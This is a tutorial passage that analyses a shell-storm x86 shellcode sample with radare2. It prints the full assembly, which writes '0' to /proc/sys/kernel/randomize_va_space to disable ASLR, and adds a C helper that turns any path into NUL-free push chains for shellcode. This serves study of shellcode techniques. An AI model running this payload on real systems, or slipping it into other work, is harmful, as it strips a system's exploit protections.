6.C.5. Radare2 analysis

We’ll be analyzing the copied and compiled variant “asm_linx86_aslr-disable_shellstorm_sample2-alt.asm” (the binary is asm_linx86_aslr-disable_shellstorm_sample2-alt). Using Radare2 can be tedious at times, but it quickly gives an overview of the functions and strings used, and even graphical, colorful views.

This is an analysis of the non-optimized version, which does not use the JMP/CALL/POP technique.

Version used

$ r2 -v
radare2 3.0.1 0 @ linux-x86-64 git.3.0.1
commit: HEAD build: 2018-10-20__19:42:15

Open the binary and run all analysis passes (-AAA)

$ r2 -AAA asm_linx86_aslr-disable_shellstorm_sample2-alt
WARNING: Cannot initialize dynamic strings
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Enable constraint types analysis for variables
[0x08048060]>

Show sections

[0x08048060]> iS
[Sections]
Nm Paddr       Size Vaddr      Memsz Perms Name
00 0x00000000     0 0x00000000     0 ---- 
01 0x00000060    83 0x08048060    83 -r-x .text
02 0x000000b3    33 0x00000000    33 ---- .shstrtab
03 0x0000019c   128 0x00000000   128 ---- .symtab
04 0x0000021c    83 0x00000000    83 ---- .strtab

List entrypoints

[0x08048060]> ie
[Entrypoints]
vaddr=0x08048060 paddr=0x00000060 baddr=0x08048000 laddr=0x00000000 haddr=0x00000018 hvaddr=0x08048018 type=program

1 entrypoints

Seek to the entrypoint address

[0x08048060]> s 0x08048060
[0x08048060]> 

Show function disassembly

The disassembly (pdf) clearly shows the string being pushed onto the stack one dword at a time for the syscalls to read: the address pointed to by ESP is then copied into EBX as the first argument (pathname) of sys_creat. The source the binary was assembled from follows.

asm_linx86_aslr-disable_shellstorm_sample2-alt.asm

global _start
section .text

_start:
	; Clear EAX (its zero also serves as the NUL terminator pushed below)
	xor    eax,eax
	
	; sys_creat (syscall 8)
	; int creat(const char *pathname, mode_t mode);
	; The path is pushed in 4-byte chunks, last chunk first; the extra '/' in
	; "//proc" pads the 35-byte path to 36 bytes so no chunk needs a 0x00 byte
	push   eax		; Terminate string with NULL
	push 0x65636170 	; 'pace'
	push 0x735f6176 	; 'va_s'
	push 0x5f657a69 	; 'ize_'
	push 0x6d6f646e 	; 'ndom'
	push 0x61722f6c 	; 'l/ra'
	push 0x656e7265 	; 'erne'
	push 0x6b2f7379 	; 'ys/k'
	push 0x732f636f 	; 'oc/s'
	push 0x72702f2f 	; '//pr'  --> "//proc/sys/kernel/randomize_va_space"
	mov    ebx,esp		; EBX = pointer to the string on the stack (pathname argument)
	mov    cx,0x2bc		; mode argument: 0x2bc = 700 decimal = 01274 octal (not 0700 / S_IRWXU);
				; the 16-bit move avoids the 0x00 bytes "mov ecx,0x2bc" would encode,
				; but leaves the upper half of ECX as it was; the mode is ignored
				; anyway because the file already exists
	mov    al,0x8		; sys_creat is syscall 0x8
	int    0x80		; syscall, returns the FD in EAX
	
	; sys_write (syscall 4)
	; ssize_t write(int fd, const void *buf, size_t count);
	mov    ebx,eax		; Copy the FD returned by creat into EBX
	push   eax		; Push the FD on the stack (never used afterwards)
	mov    dx,0x3a30	; Data to write: bytes '0' (0x30) and ':' (0x3a)
	push   dx		; Push both bytes; ESP now points at '0'
	mov    ecx,esp		; ECX = pointer to the buffer ("0:")
	xor    edx,edx		; Clear EDX
	inc    edx		; count = 1, so only the '0' is written
	mov    al,0x4		; sys_write is syscall 0x4
	int    0x80		; syscall; writing "0" disables ASLR system-wide (requires root)
	
	; sys_close (syscall 6); EBX still holds the FD
	mov    al,0x6		; Close call (EAX was 1, the byte count returned by write)
	int    0x80		; syscall
	
	; sys_exit (syscall 1)
	inc    eax		; close returned 0, increment to 1 for sys_exit
	int    0x80		; syscall exit (exit status = EBX, i.e. the old FD)
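The push chain above is the one place in this sample where a reader has to do byte arithmetic by hand: each dword is the next four characters of the path, stored little-endian, pushed in reverse so that ESP ends up pointing at the first byte, and the path is left-padded with an extra '/' so its length is a multiple of four and no chunk needs a 0x00 byte. The following C program is an added example, not code from the page or from the shell-storm sample: it encodes an arbitrary absolute path into such push immediates (generalizing the trick from the one path the sample uses), decodes the sample's nine immediates back into the string the stack holds, and checks the shellcode constraint that no immediate contains a NUL byte. The slash-padding rule, the function names and the x86 little-endian stack layout are this example's assumptions.

```c
/*
 * Added example, not part of the original page or the shell-storm sample:
 * encode/decode the "push imm32" string-building trick used by the sample.
 * Assumptions: x86 little-endian stack; absolute paths are padded with
 * leading '/' (the kernel collapses repeated slashes during lookup).
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DWORDS 16

/* The nine immediates exactly as the sample pushes them, in push order. */
static const uint32_t SAMPLE_IMM[9] = {
    0x65636170, 0x735f6176, 0x5f657a69, 0x6d6f646e, 0x61722f6c,
    0x656e7265, 0x6b2f7379, 0x732f636f, 0x72702f2f
};
static const char SAMPLE_PATH[] = "/proc/sys/kernel/randomize_va_space";

/*
 * Encoder: produce the imm32 values a push chain needs so that, after
 * "push 0" followed by these pushes, ESP points at the NUL-terminated
 * string. Leading '/' are prepended until the length is a multiple of 4,
 * so no dword ever needs a 0x00 pad byte. Returns the number of immediates
 * in push order (last four bytes of the string first), or -1 if unusable.
 */
int encode_push_immediates(const char *path, uint32_t *out, int max)
{
    char padded[4 * MAX_DWORDS + 1];
    size_t len = strlen(path);
    size_t pad = (4 - len % 4) % 4;
    size_t total = len + pad, i;

    /* A relative path cannot be slash-padded without changing its meaning. */
    if (len == 0 || path[0] != '/' || total > 4 * MAX_DWORDS ||
        total / 4 > (size_t)max)
        return -1;
    memset(padded, '/', pad);
    memcpy(padded + pad, path, len + 1);

    for (i = 0; i < total / 4; i++) {
        const unsigned char *p =
            (const unsigned char *)padded + total - 4 * (i + 1);
        out[i] = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                 (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    }
    return (int)(total / 4);
}

/*
 * Decoder: rebuild the string as it lies in memory after the pushes. The
 * first push lands at the highest address, so the last immediate pushed is
 * the one ESP points at and its bytes come first, little-endian.
 * Returns the string length, or -1 if buf is too small.
 */
int decode_stack_string(const uint32_t *imm, int n, char *buf, size_t bufsz)
{
    int i, k;
    size_t pos = 0;

    if (bufsz < 4 * (size_t)n + 1)
        return -1;
    for (i = n - 1; i >= 0; i--)
        for (k = 0; k < 4; k++)
            buf[pos++] = (char)(imm[i] >> (8 * k));
    buf[pos] = '\0';
    return (int)pos;
}

/* Shellcode constraint: no immediate may contain a 0x00 byte. */
int immediates_are_nul_free(const uint32_t *imm, int n)
{
    int i, k;
    for (i = 0; i < n; i++)
        for (k = 0; k < 4; k++)
            if (((imm[i] >> (8 * k)) & 0xff) == 0)
                return 0;
    return 1;
}

/* Convenience: how many pushes a path costs, or -1 if it cannot be encoded. */
int push_count(const char *path)
{
    uint32_t tmp[MAX_DWORDS];
    return encode_push_immediates(path, tmp, MAX_DWORDS);
}

/*
 * Round trip on the page's own values: decoding the nine immediates must
 * give "//proc/sys/kernel/randomize_va_space", and re-encoding the
 * canonical path must reproduce the immediates byte for byte.
 */
int sample_roundtrip_ok(void)
{
    char buf[4 * MAX_DWORDS + 1];
    uint32_t enc[MAX_DWORDS];
    int n = decode_stack_string(SAMPLE_IMM, 9, buf, sizeof buf);

    if (n != 36 || strcmp(buf, "//proc/sys/kernel/randomize_va_space") != 0)
        return 0;
    if (encode_push_immediates(SAMPLE_PATH, enc, MAX_DWORDS) != 9)
        return 0;
    return memcmp(enc, SAMPLE_IMM, sizeof SAMPLE_IMM) == 0 &&
           immediates_are_nul_free(enc, 9);
}

int main(void)
{
    uint32_t imm[MAX_DWORDS];
    int n = encode_push_immediates(SAMPLE_PATH, imm, MAX_DWORDS), i;

    printf("sample round trip: %s\n", sample_roundtrip_ok() ? "ok" : "MISMATCH");
    for (i = 0; i < n; i++)   /* print the chain in the sample's own format */
        printf("push 0x%08x\t; '%c%c%c%c'\n", imm[i],
               imm[i] & 0xff, (imm[i] >> 8) & 0xff,
               (imm[i] >> 16) & 0xff, imm[i] >> 24);
    /* 0x2bc is 700 decimal, i.e. octal 01274, not 0700 (S_IRWXU). */
    printf("mode 0x2bc = %u decimal = 0%o octal\n", 0x2bcu, 0x2bcu);
    return 0;
}
```

Running it prints the nine push lines with their character comments, which is a quick way to confirm the 'l/ra' chunk and to generate the chain for a different path (for example, "/etc/passwd" becomes three pushes of "//etc/passwd"). The mode line makes the 0x2bc point concrete: the sample's author evidently meant octal 0700 but assembled decimal 700, which is harmless here only because creat ignores the mode for a file that already exists.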